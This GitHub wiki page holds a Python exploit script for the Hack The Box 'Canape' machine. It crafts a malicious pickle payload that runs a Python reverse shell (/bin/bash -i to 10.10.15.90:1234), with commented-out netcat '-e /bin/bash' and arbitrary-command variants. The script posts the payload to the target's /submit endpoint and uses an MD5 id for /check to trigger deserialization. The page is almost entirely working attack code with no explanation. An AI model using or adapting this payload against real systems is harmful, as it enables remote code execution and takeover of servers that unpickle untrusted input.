canape - adydawkins/htb-rabbit GitHub Wiki

import cPickle
import requests
from hashlib import md5


#cmd = raw_input("Ingresa comando: ")


char = "cposix\nsystem\np0\n(S'echo homerp1;python -c %27import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.15.90%22,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27'\np1\ntp2\nRp3\n."

#char = "cposix\nsystem\np0\n(S'echo homerp1;nc 10.10.15.16 1234'\np1\ntp2\nRp3\n."
#char = "cposix\nsystem\np0\n(S'echo homerp1;nc -e /bin/bash 10.10.15.16 1234'\np1\ntp2\nRp3\n."
#char = "cposix\nsystem\np0\n(S'echo homerp1;"+cmd+" > /tmp/SK11'\np1\ntp2\nRp3\n."

quote = " "

#md5
mdh = md5(char + quote).hexdigest()
print("hash -> "+mdh)
print ""
# data for write commands on db
dataPOST = "character="+char + "&quote="+quote

# sending post request and saving response as response object
r = requests.post("http://10.10.10.70/submit", data = dataPOST, headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://127.0.0.1:5000/submit", data = dataPOST, headers={"Content-Type": "application/x-www-form-urlencoded"})
 
#sending the paylod
#r = requests.post("http://10.10.10.70/check", data = "id="+mdh, headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://127.0.0.1:5000/check", data = "id="+mdh, headers={"Content-Type": "application/x-www-form-urlencoded"})
print r.text

#sending the paylod
#r = requests.post("http://127.0.0.1:5000/check", data = "id=SK11", headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://10.10.10.70/check", data = "id=SK11", headers={"Content-Type": "application/x-www-form-urlencoded"})
#print r.text